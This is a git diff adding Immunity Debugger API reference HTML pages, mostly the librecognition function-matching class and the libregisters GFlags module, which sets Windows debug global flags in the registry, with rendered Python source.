688 r = re . compile ( "(?<=[ ,\[])[a-z0-9_\.\-\@]*%X" % op . getJmpConst ( ) , re . I )
+
689 asm = r . sub ( 'CONST' , asm )
+
690
+
691
+
692 asm = re . sub ( r'(?i)<[a-z\.&_0-9\@\-]+>' , "CONST" , asm )
+
693
+
694
+
695 asm = re . sub ( r'(?i)[a-z\.&_0-9\@\-]+\.[a-z\.&_0-9\@\-]+' , "CONST" , asm )
+
696
+
697
+
698 if not op . getAddrConst ( ) or not op . indexed :
+
699 asm = re . sub ( r'(?i)(?<![A-Z])E([ABCD]X|[SD]I)(?![A-Z])' , 'R32' , asm )
+
700 else :
+
701
+
702 asm = re . sub ( r'(?i)(?<![A-Z\+\-\[])E([ABCD]X|[SD]I)(?![A-Z])' , 'R32' , asm )
+
703 asm = re . sub ( r'(?i)(?<![A-Z])([ABCD]X|[SD]I)(?![A-Z])' , 'R16' , asm )
+
704 asm = re . sub ( r'(?i)(?<![A-Z])[ABCD][HL](?![A-Z])' , 'R8' , asm )
+
705
+
706
+
707
+
708
+
709 return asm
+
710
+
712 """
+
713 Try to match a generalized BB with an address range (moving backward).
+
714
+
715 @type address: DWORD
+
716 @param address: address used to match with the generalized BB
+
717
+
718 @type firstbb: LIST
+
719 @param firstbb: a list of generalized assembler instructions
+
720
+
721 @type maxsteps: INTEGER
+
722 @param maxsteps: max amount of steps to go backward looking for a BB
+
723
+
724 @rtype: DWORD|None
+
725 @return: starting address of the BB that match with the generalized version or None if we don't find it
+
726 """
+
727
+
728 index = address
+
729 instr = 0
+
730 while instr < maxsteps :
+
731 num = 0
+
732 notmatch = False
+
733
+
734 for cmp in firstbb :
+
735 gen = self . generalizeInstruction ( self . imm . disasmForward ( index , num ) )
+
736 if gen != cmp :
+
737 notmatch = True
+
738
+
739 break
+
740 num += 1
+
741
+
742 if notmatch :
+
743 index = self . imm . disasmBackward ( index , 1 ) . getAddress ( )
+
744 instr += 1
+
745 else :
+
746
+
747 return index
+
748
+
749 return None
+
750
+
752 """
+
753 The main idea is traverse a function backward following Xrefs until we reach a point where there's no more Xrefs other than CALLs
+
754
+
755 @type address: DWORD
+
756 @param address: address used find the first BB
+
757
+
758 @rtype: DWORD|None
+
759 @return: Address of the first BB of the function or None if we don't find it
+
760 """
+
761
+
762 poss = [ ]
+
763
+
764 xref = self . imm . getXrefFrom ( address )
+
765 for info in xref :
+
766 if info [ 1 ] != 3 :
+
767
+
768 poss . append ( info [ 0 ] )
+
769
+
770 if not xref and not recursive :
+
771 return None
+
772 if not poss :
+
773 return address
+
774
+
775 for addy in poss :
+
776 tmp = self . findFirstBB ( addy , True )
+
777 if tmp :
+
778 return addy
+
779
+
780 return None
+
781
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.librecognition.FunctionRecognition-class.html b/1.73/Documentation/Ref/Libs.librecognition.FunctionRecognition-class.html
new file mode 100755
index 0000000..439efb5
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.librecognition.FunctionRecognition-class.html
@@ -0,0 +1,914 @@
+
+
+
+
+ Libs.librecognition.FunctionRecognition
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class FunctionRecognition source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ dictionaryfiles =None )
+ source code
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ INTEGER
+
+
+
+ checkHeuristic (self ,
+ address ,
+ reference ,
+ refFirstCall =[]
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ compareHeuristic (self ,
+ cfg ,
+ refcfg )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ makeFunctionHashHeuristic (self ,
+ address ,
+ compressed =False ,
+ followCalls =True )
+ source code
+
+
+
+
+
+
+
+ UNSIGNED LONG
+
+
+
+ hash_a_list (self ,
+ data )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+
+
+
+
+ LIST
+
+
+
+ _searchFunctionByHeuristic (self ,
+ search ,
+ functionhash =None ,
+ firstcallhash =None ,
+ exact =None ,
+ heuristic =90 ,
+ module =None ,
+ firstbb =None )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+ searchFunctionByName (self ,
+ name ,
+ heuristic =90 ,
+ module =None ,
+ version =None )
+ source code
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ LIST
+
+
+
+ makeFunctionHash (self ,
+ address ,
+ compressed =False )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ selectBasicBlock (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+ LIST
+
+
+
+ generalizeFunction (self ,
+ address )
+ source code
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ DWORD|None
+
+
+
+
+
+
+
+ DWORD|None
+
+
+
+ findFirstBB (self ,
+ address ,
+ recursive =False )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ dictionaryfiles =None )(Constructor)
+ source code
+
+ This class try to recognize a function using different methods
+ (address/signature/heuristic).
+
+ Parameters:
+
+ immdictionaryfiles
+
+
+
+
+
+
+ resolvFunctionByAddress (self ,
+ address ,
+ heuristic =90 ) source code
+
+ Look up into our dictionaries to find a function match.
+
+ Parameters:
+
+ addressheuristic Returns: STRING
+ a STRING with the function's real name or the given address if
+ there's no match
+
+
+
+
+
+
+
+ checkHeuristic (self ,
+ address ,
+ reference ,
+ refFirstCall =[] source code
+
+ Check a given address with a precomputed hash of a function. Return a
+ percentage of match (you can use a threasold to consider a real
+ match)
+
+ Parameters:
+
+ addressreferencerefFirstCall Returns: INTEGER
+ heuristic threasold to consider a real function match
+
+
+
+
+
+
+
+ makeFunctionHashHeuristic (self ,
+ address ,
+ compressed =False ,
+ followCalls =True ) source code
+
+
+
+Consider:
+- Control Flow Graph
+- generalized instructions that:
+ access memory/write memory/use registers/use constant/call/jmp/jmc
+ and all his combinations.
+- special case of functions with just 1 BB and a couple of calls (follow the first call)
+
+@type address: DWORD
+@param address: address of the function to hash
+
+@type compressed: Boolean
+@param compressed: return a compressed base64 representation or the raw data
+
+@type followCalls: Boolean
+@param followCalls: follow the first call in a single basic block function
+
+@rtype: LIST
+@return: the first element is described below and the second is the result of this same function but over the first
+ call of a single basic block function (if applies), each element is like this:
+ a base64 representation of the compressed version of each bb hash:
+ [4 bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd edge]
+ 0 <= i < BB count
+ or the same but like a LIST with raw data.
+
+
+
+
+
+
+
+
+
+
+ Take a list and return a binary representation of his CRC32.
+
+ Parameters:
+
+ data Returns: UNSIGNED LONG
+ a hash of the given values
+
+
+
+
+
+
+
+ searchFunctionByHeuristic (self ,
+ csvline ,
+ heuristic =90 ,
+ module =None ) source code
+
+ Search memory to find a function that fullfit the options.
+
+ Parameters:
+
+ csvlineheuristicmodule Returns: LIST
+ a list of tuples with possible function's addresses and the
+ heauristic match percentage
+
+
+
+
+
+
+
+ _searchFunctionByHeuristic (self ,
+ search ,
+ functionhash =None ,
+ firstcallhash =None ,
+ exact =None ,
+ heuristic =90 ,
+ module =None ,
+ firstbb =None ) source code
+
+ Search memory to find a function that fullfit the options.
+
+ Parameters:
+
+ searchfunctionhashfirstcallhashexactheuristicmodulefirstbb Returns: LIST
+ a list of tuples with possible function's addresses and the
+ heauristic match percentage
+
+
+
+
+
+
+
+ searchFunctionByName (self ,
+ name ,
+ heuristic =90 ,
+ module =None ,
+ version =None ) source code
+
+ Look up into our dictionaries to find a function match.
+
+ Parameters:
+
+ namemoduleversionheuristic Returns: LIST
+ a list of tuples with possible function's addresses and the
+ heauristic match percentage
+
+
+
+
+
+
+
+ makeFunctionHashExact (self ,
+ address ) source code
+
+ Return a SHA-1 hash of the function, taking the raw bytes as data.
+
+ Parameters:
+
+ address Returns: STRING
+ SHA-1 hash of the function
+
+
+
+
+
+
+
+ makeFunctionHash (self ,
+ address ,
+ compressed =False ) source code
+
+ Return a list with the best BB to use for a search and the heuristic
+ hash of the function. This two components are the function hash.
+
+ Parameters:
+
+ addresscompressed Returns: LIST
+ 1st element is the generalized instructions to use with
+ searchCommand 2nd element is the heuristic function hash
+ (makeFunctionHashHeuristic) 3rd element is an exact hash of the
+ function (makeFunctionHashExact) 4th element is a LIST of
+ generalized instructions of the first BB (to find the function
+ begin)
+
+
+
+
+
+
+
+ generalizeFunction (self ,
+ address ) source code
+
+ Take an address an return a generalized version of the function,
+ dismissing address and register dependant information.
+
+ Parameters:
+
+ address Returns: LIST
+ the 1st value is a DICTIONARY of a Control Flow Graph of the BB
+ conexions (each BB have an arbitrary ID) the 2nd value is a
+ DICTIONARY using this arbitrary BB ID as the key and a LIST of
+ searchCommand suitable, generalized instructions.
+
+
+
+
+
+
+
+ generalizeInstruction (self ,
+ inp ) source code
+
+ Generalize an instruction given an address or an opCode instance
+
+ Parameters:
+
+ inp Returns: STRING
+ a generalized assembler instruction
+
+
+
+
+
+
+
+ findBasicBlockHeuristically (self ,
+ address ,
+ firstbb ,
+ maxsteps =20 ) source code
+
+ Try to match a generalized BB with an address range (moving
+ backward).
+
+ Parameters:
+
+ addressfirstbbmaxsteps Returns: DWORD|None
+ starting address of the BB that match with the generalized
+ version or None if we don't find it
+
+
+
+
+
+
+
+ findFirstBB (self ,
+ address ,
+ recursive =False ) source code
+
+ The main idea is traverse a function backward following Xrefs until we
+ reach a point where there's no more Xrefs other than CALLs
+
+ Parameters:
+
+ address Returns: DWORD|None
+ Address of the first BB of the function or None if we don't find
+ it
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.librecognition.MultiCSVIterator-class.html b/1.73/Documentation/Ref/Libs.librecognition.MultiCSVIterator-class.html
new file mode 100755
index 0000000..c99ed19
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.librecognition.MultiCSVIterator-class.html
@@ -0,0 +1,192 @@
+
+
+
+
+ Libs.librecognition.MultiCSVIterator
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class MultiCSVIterator source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ dictionaries )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libregisters-module.html b/1.73/Documentation/Ref/Libs.libregisters-module.html
new file mode 100755
index 0000000..517e183
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libregisters-module.html
@@ -0,0 +1,277 @@
+
+
+
+
+ Libs.libregisters
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libregisters
+
+
+
+
+
+
+
+
+Module libregisters source code (c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+
+
+
+ __version__ = '1.0'
+
+
+
+
+
+
+ GFlagsTags = ['ddp', 'kst', 'ust', 'dic', 'dwl', 'dhc', 'dps', 'd...
+
+
+
+
+
+
+ GFlagsRef = {'htg': ('Enable heap tagging', 2048, 'FLG_HEAP_ENAB...
+
+
+
+
+
+
+ g = GFlags("notepad.exe")
+
+
+
+
+
+
+
+ __version__
+ None
+
+ Value:
+
+
+
+
+ GFlagsTags
+ None
+
+ Value:
+
+['ddp', 'kst', 'ust', 'dic', 'dwl', 'dhc', 'dps', 'dpd', 'dse']
+
+
+
+
+ GFlagsRef
+ None
+
+ Value:
+
+{'bhd': ('Enable bad handles detection',
+ 1073741824,
+ 'FLG_ENABLE_HANDLE_EXCEPTIONS',
+ ['Systemwide registry entry', 'kernel mode.'],
+ 'Raises a user mode exception (STATUS_INVALID_HANDLE) wheneve...
+
+
+
+
+ g
+ None
+
+ Value:
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libregisters-pysrc.html b/1.73/Documentation/Ref/Libs.libregisters-pysrc.html
new file mode 100755
index 0000000..adde740
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libregisters-pysrc.html
@@ -0,0 +1,342 @@
+
+
+
+
+ Libs.libregisters
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libregisters
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 """ 11
+ 12 __version__ = '1.0'
+ 13
+ 14 import _winreg 15
+ 16
+ 17
+ 18
+ 19
+ 20
+ 21
+ 22
+ 23
+ 24
+ 25
+ 26
+ 27
+ 28 GFlagsTags = [ 'ddp' , 'kst' , 'ust' , 'dic' , 'dwl' , 'dhc' , 'dps' , 'dpd' , 'dse' , 'cse' , 'vrf' , 'bhd' , 'ece' , 'd32' , 'eel' , 'hfc' , 'hpc' , 'htg' , 'htd' , 'htc' , 'hvc' , 'ksl' , 'eot' , 'hpa' , 'ptg' , 'scb' , 'ltd' , 'otl' , 'sls' , 'soe' , 'shg' ]
+ 29
+ 30 GFlagsRef = { }
+ 31 GFlagsRef [ 'ddp' ] = ( 'Buffer DbgPrint output' , 0x08000000 , 'FLG_DISABLE_DBGPRINT' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Suppresses debugger output from DbgPrint(), DbgPrintEx(), KdPrint(), and KdPrintEx() calls. When this output is suppressed, it does not automatically appear in the kernel debugger. However, it can still be accessed by using the !dbgprint debugger extension. """ )
+ 32 GFlagsRef [ 'kst' ] = ( 'Create kernel mode stack trace database' , 0x2000 , 'FLG_KERNEL_STACK_TRACE_DB' , [ 'Systemwide registry entry.' ] , """Creates a run-time stack trace database of kernel operations, such as resource objects and object management operations. This feature works only when using a "checked build," that is, an internal debugging build of the operating system. """ )
+ 33 GFlagsRef [ 'ust' ] = ( 'Create user mode stack trace database' , 0x1000 , 'FLG_USER_STACK_TRACE_DB' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Creates a run-time stack trace database in the address space of a particular process (image file mode) or all processes (systemwide). """ )
+ 34 GFlagsRef [ 'dic' ] = ( 'Debug initial command' , 0x4 , 'FLG_DEBUG_INITIAL_COMMAND' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Runs Winlogon in the Windows Symbolic Debugger (Ntsd.exe) with the -d parameter, which directs its output to the kernel debugger console. """ )
+ 35 GFlagsRef [ 'dwl' ] = ( 'Debug Winlogon' , 0x04000000 , 'FLG_DEBUG_INITIAL_COMMAND_EX' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Runs Winlogon in the Windows Symbolic Debugger (Ntsd.exe) with the following options: """ )
+ 36 GFlagsRef [ 'dhc' ] = ( 'Disable heap coalesce on free' , 0x00200000 , 'FLG_HEAP_DISABLE_COALESCING' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Leaves adjacent blocks of heap memory separate when they are freed. By default, the system combines ("coalesces") newly freed adjacent blocks into a single block. Combining the blocks takes time, but reduces fragmentation that might force the heap to allocate additional memory when it can't find contiguous memory. """ )
+ 37 GFlagsRef [ 'dps' ] = ( 'Disable paging of kernel stacks' , 0x80000 , 'FLG_DISABLE_PAGE_KERNEL_STACKS' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Prevents paging of the kernel mode stacks of inactive threads. Generally, the kernel mode stack cannot be paged; it is guaranteed to be resident in memory. However, the system occasionally pages the kernel stacks of inactive threads. This flag prevents these occurrences. """ )
+ 38 GFlagsRef [ 'dpd' ] = ( 'Disable protected DLL verification' , 0x80000000 , 'FLG_DISABLE_PROTDLLS' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """""" )
+ 39 GFlagsRef [ 'dse' ] = ( 'Disable stack extension' , 0x10000 , 'FLG_DISABLE_STACK_EXTENSION' , [ 'image file registry entry.' ] , """Prevents the kernel from extending the stacks of the threads in the process beyond the initial memory committed. This is used to simulate low memory conditions (where stack extensions fail) and to test the strategic system processes that are expected to run well even with low memory. """ )
+ 40 GFlagsRef [ 'cse' ] = ( 'Early critical section event creation' , 0x10000000 , 'FLG_CRITSEC_EVENT_CREATION' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Creates event handles when a critical section is initialized, rather than waiting until the event is needed. When the system cannot create an event, it generates the exception during initialization and the calls to enter and leave the critical section do not fail. """ )
+ 41 GFlagsRef [ 'vrf' ] = ( 'Enable application verifier' , 0x100 , 'FLG_APPLICATION_VERIFIER' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """""" )
+ 42 GFlagsRef [ 'bhd' ] = ( 'Enable bad handles detection' , 0x40000000 , 'FLG_ENABLE_HANDLE_EXCEPTIONS' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Raises a user mode exception (STATUS_INVALID_HANDLE) whenever a user mode process passes an invalid handle to the Object Manager. """ )
+ 43 GFlagsRef [ 'ece' ] = ( 'Enable close exception' , 0x00400000 , 'FLG_ENABLE_CLOSE_EXCEPTIONS' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Raises a user mode exception whenever an invalid handle is passed to the CloseHandle() interface or related interfaces, such as SetEvent(), that take handles as arguments. """ )
+ 44 GFlagsRef [ 'd32' ] = ( 'Enable debugging of Win32 subsystem' , 0x20000 , 'FLG_ENABLE_CSRDEBUG' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """""" )
+ 45 GFlagsRef [ 'eel' ] = ( 'Enable exception logging' , 0x00800000 , 'FLG_ENABLE_EXCEPTION_LOGGING' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Creates a log of exception records in the kernel run-time library. You can access the log from the kernel debugger. """ )
+ 46 GFlagsRef [ 'hfc' ] = ( 'Enable heap free checking' , 0x20 , 'FLG_HEAP_ENABLE_FREE_CHECK' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Validates the heap when it is freed. """ )
+ 47 GFlagsRef [ 'hpc' ] = ( 'Enable heap parameter checking' , 0x40 , 'FLG_HEAP_VALIDATE_PARAMETERS' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Verifies some aspects of the heap whenever a heap API is called. """ )
+ 48 GFlagsRef [ 'htg' ] = ( 'Enable heap tagging' , 0x800 , 'FLG_HEAP_ENABLE_TAGGING' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Assigns unique tags to heap allocations. You can display the tag by using the !heap debugger extension with the -t parameter. """ )
+ 49 GFlagsRef [ 'htd' ] = ( 'Enable heap tagging by DLL' , 0x8000 , 'FLG_HEAP_ENABLE_TAG_BY_DLL' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Assigns a unique tag to heap allocations created by the same DLL. You can display the tag by using the !heap debugger extension with the -t parameter. """ )
+ 50 GFlagsRef [ 'htc' ] = ( 'Enable heap tail checking' , 0x10 , 'FLG_HEAP_ENABLE_TAIL_CHECK' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Checks for buffer overruns when the heap is freed. This flag adds a short pattern to the end of each allocation. The Windows heap manager detects the pattern when the block is freed and, if the block was modified, the heap manager breaks into the debugger. """ )
+ 51 GFlagsRef [ 'hvc' ] = ( 'Enable heap validation on call' , 0x80 , 'FLG_HEAP_VALIDATE_ALL' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Validates the entire heap each time a heap API is called. """ )
+ 52 GFlagsRef [ 'ksl' ] = ( 'Enable loading of kernel debugger symbols' , 0x40000 , 'FLG_ENABLE_KDEBUG_SYMBOL_LOAD' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Loads kernel symbols into the kernel memory space the next time the system starts. The kernel symbols are used in kernel profiling and by advanced kernel debugging tools. """ )
+ 53 GFlagsRef [ 'eot' ] = ( 'Enable object handle type tagging' , 0x01000000 , 'FLG_ENABLE_HANDLE_TYPE_TAGGING' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """This flag appears in Gflags, but it has no effect on the operating system. """ )
+ 54 GFlagsRef [ 'hpa' ] = ( 'Enable page heap' , 0x02000000 , 'FLG_HEAP_PAGE_ALLOCS' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Turns on page heap debugging, which verifies dynamic heap memory operations, including allocations and frees, and causes a debugger break when it detects a heap error. """ )
+ 55 GFlagsRef [ 'ptg' ] = ( 'Enable pool tagging' , 0x400 , 'FLG_POOL_ENABLE_TAGGING' , [ 'Systemwide registry entry.' ] , """Collects data and calculates statistics about pool memory allocations. The data is grouped by pool tag value. Several tools that diagnose memory leaks and other kernel pool errors use the resulting data. """ )
+ 56 GFlagsRef [ 'scb' ] = ( 'Enable system critical breaks' , 0x100000 , 'FLG_ENABLE_SYSTEM_CRIT_BREAKS' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """For per-process (image file) only: Forces a system breakpoint into the debugger whenever the specified process stops abnormally. This flag is effective only when the process calls the RtlSetProcessBreakOnExit() and RtlSetThreadBreakOnExit() interfaces. """ )
+ 57 GFlagsRef [ 'ltd' ] = ( 'Load DLLs top-down' , 0x20000000 , 'FLG_LDR_TOP_DOWN' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Loads DLLs at the highest possible address. This flag is used to test 64-bit code for pointer truncation errors, because the most significant 32 bits of the pointers are not zeroes. It is designed for code running on the 64-bit versions of the Windows Server 2003. """ )
+ 58 GFlagsRef [ 'otl' ] = ( 'Maintain a list of objects for each type' , 0x4000 , 'FLG_MAINTAIN_OBJECT_TYPELIST' , [ 'Systemwide registry entry' , 'kernel mode.' ] , """Collects and maintains a list of active objects by object type (for example, event, mutex, and semaphore). """ )
+ 59 GFlagsRef [ 'sls' ] = ( 'Show loader snaps' , 0x2 , 'FLG_SHOW_LDR_SNAPS' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """Captures detailed information about the loading and unloading of executable images and their supporting library modules. """ )
+ 60 GFlagsRef [ 'soe' ] = ( 'Stop on exception' , 0x1 , 'FLG_STOP_ON_EXCEPTION' , [ 'Systemwide registry entry' , 'kernel mode' , 'image file registry entry.' ] , """The kernel breaks into the kernel debugger whenever a kernel mode exception occurs. The system passes all first chance exceptions (except for STATUS_PORT_DISCONNECT) with a severity of Warning or Error to the debugger before passing them to a local exception handler. """ )
+ 61 GFlagsRef [ 'shg' ] = ( 'Stop on hung GUI' , 0x8 , 'FLG_STOP_ON_HUNG_GUI' , [ 'kernel mode' ] , """""" )
+ 62
+ 63
+ 64
+
67 """
+ 68 GFlags class enable and disable Windows global flags 69 70 @type processname: STRING 71 @param processname: (Optional) Process name (If is unset, it will use the system global flags) 72 """ 73 self . processname = processname
+ 74
+ 75 if self . processname :
+ 76 self . subkey = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s" % self . processname
+ 77 else :
+ 78 self . subkey = "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\"
+
79
+
80
+
82 try :
+ 83 hkey = _winreg . OpenKey ( _winreg . HKEY_LOCAL_MACHINE , self . subkey )
+ 84 except WindowsError :
+ 85 raise Exception , "Cannot Openkey for Query (%s)" % self . subkey
+ 86
+ 87 try :
+ 88 return _winreg . QueryValueEx ( hkey , "GlobalFlag" ) [ 0 ]
+ 89 except WindowsError :
+ 90 raise Exception , "Cannot Query value (%s\\%s)" % ( self . subkey , "GlobalFlag" )
+
91
+
93 """
+
94 Get Flag information by its shorcut name
+
95
+
96 @type val: STRING
+
97 @param val: Shortcut Name
+
98
+
99 @rtype: TUPLE
+
100 @return: A tuple containning all the internal information of a Flag
+
101 """
+
102 val = val . lower ( )
+
103 try :
+
104 r = GFlagsRef [ val ]
+
105 except KeyError :
+
106 raise Exception , "'%s' is not a gflag value" % val
+
107 if self . processname :
+
108 if 'image file registry entry.' not in r [ 3 ] :
+
109 raise Exception , "Flag '%s' is not available for Image file (only for: %s)" % ( val , str ( r [ 3 ] ) )
+
110
+
111 return r
+
112
+
114 """
+
115 Set a Flag by its shorcut name
+
116
+
117 @type val: STRING
+
118 @param val: Shortcut Name
+
119 """
+
120 r = self . GetReferencebyName ( val )
+
121 return self . Set ( r [ 1 ] )
+
122
+
123 - def Set ( self , val ) :
+
124 """
+
125 Set a Flag
+
126
+
127 @type val: DWORD
+
128 @param val: Value of the flag to set
+
129 """
+
130
+
131 try :
+
132 current = self . _query ( )
+
133 except Exception :
+
134
+
135 current = 0L
+
136
+
137 self . _set ( current | val )
+
138
+
139 return current | val
+
140
+
142 """
+
143 Unset a Flag by its shorcut name
+
144
+
145 @type val: STRING
+
146 @param val: Shortcut Name
+
147 """
+
148 r = self . GetReferencebyName ( val )
+
149 return self . UnSet ( r [ 1 ] )
+
150
+
152 """
+
153 Set a Flag
+
154
+
155 @type val: DWORD
+
156 @param val: Value of the flag to set
+
157 """
+
158
+
159 current = self . _query ( )
+
160 self . _set ( current & ~ val )
+
161
+
162 return current & ~ val
+
163
+
165 """
+
166 Whether a Flag is set
+
167
+
168 @type val: STRING
+
169 @param val: Shortcut name
+
170 """
+
171
+
172 r = self . GetReferencebyName ( val )
+
173 current = self . _query ( )
+
174
+
175 return bool ( r [ 1 ] & current )
+
176
+
178 """
+
179 Print all the current setted GFlags
+
180
+
181 @rtype: LIST OF TUPLES
+
182 @return: A list of a tuple with two elements: Shortcut Name and flag information
+
183 """
+
184 current = self . _query ( )
+
185 ret = [ ]
+
186 for a in GFlagsRef . keys ( ) :
+
187 r = GFlagsRef [ a ]
+
188 if r [ 1 ] & current :
+
189 ret . append ( ( a , r ) )
+
190 return ret
+
191
+
193 """
+
194 Clear the Flags
+
195 """
+
196 if self . processname :
+
197 _winreg . DeleteKey ( _winreg . HKEY_LOCAL_MACHINE , self . subkey )
+
198 else :
+
199 self . _set ( 0 )
+
200
+201 - def _set ( self , flag ) :
+
202 try :
+203 hkey = _winreg . OpenKey ( _winreg . HKEY_LOCAL_MACHINE , self . subkey , 0 , _winreg . KEY_SET_VALUE )
+204 except WindowsError :
+205 try :
+206 hkey = _winreg . CreateKey ( _winreg . HKEY_LOCAL_MACHINE , self . subkey )
+207 except WindowsError :
+208 raise Exception , "Cannot Open/Create key (%s)" % self . subkey
+209
+210 try :
+211 _winreg . SetValueEx ( hkey , "GlobalFlag" , 0 , _winreg . REG_DWORD , int ( flag ) )
+212 except WindowsError :
+213 raise Exception , "Cannot SetValue key (%s\\%s)" % ( self . subkey , "GlobalFlag" )
+214 except ValueError :
+215 raise Exception , "Cannot SetValue key (%s\\%s) %s %s" % ( self . subkey , "GlobalFlag" , str ( flag ) , type ( flag ) )
+216
+217 try :
+218 _winreg . CloseKey ( hkey )
+219 except WindowsError :
+220 raise Exception , "Cannot Close key (%s)" % self . subkey
+
221
+222 if __name__ == "__main__" : 223 g = GFlags ( "notepad.exe" )
+224 g . Set ( 'htc' )
+225 g . Clear ( )
+226
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libregisters.GFlags-class.html b/1.73/Documentation/Ref/Libs.libregisters.GFlags-class.html
new file mode 100755
index 0000000..b79ac17
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libregisters.GFlags-class.html
@@ -0,0 +1,493 @@
+
+
+
+
+ Libs.libregisters.GFlags
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class GFlags source code
+
+
+
+
+
+ __init__ (self ,
+ processname ="" )
+
+
+
+
+
+ _query (self )
+
+
+
+ TUPLE
+
+ GetReferencebyName (self ,
+ val )
+
+
+
+
+
+ SetbyName (self ,
+ val )
+
+
+
+
+
+ Set (self ,
+ val )
+
+
+
+
+
+ UnSetbyName (self ,
+ val )
+
+
+
+
+
+ UnSet (self ,
+ val )
+
+
+
+
+
+ isSet (self ,
+ val )
+
+
+
+ LIST OF TUPLES
+
+ Print (self )
+
+
+
+
+
+ Clear (self )
+
+
+
+
+
+ _set (self ,
+ flag )
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ processname ="" )(Constructor)
+ source code
+
+ GFlags class enable and disable Windows global flags
+
+ Parameters:
+ processnameSTRING) - (Optional) Process name (If is unset, it will use the system
+ global flags)
+
+
+
+
+
+
+ Get Flag information by its shorcut name
+
+ Parameters:
+ valSTRING) - Shortcut Name
+ Returns: TUPLE
+ A tuple containning all the internal information of a Flag
+
+
+
+
+
+ Set a Flag by its shorcut name
+
+ Parameters:
+ valSTRING) - Shortcut Name
+
+
+
+
+
+
+ Set a Flag
+
+ Parameters:
+ valDWORD) - Value of the flag to set
+
+
+
+
+
+
+ Unset a Flag by its shorcut name
+
+ Parameters:
+ valSTRING) - Shortcut Name
+
+
+
+
+
+
+ Set a Flag
+
+ Parameters:
+ valDWORD) - Value of the flag to set
+
+
+
+
+
+
+ Whether a Flag is set
+
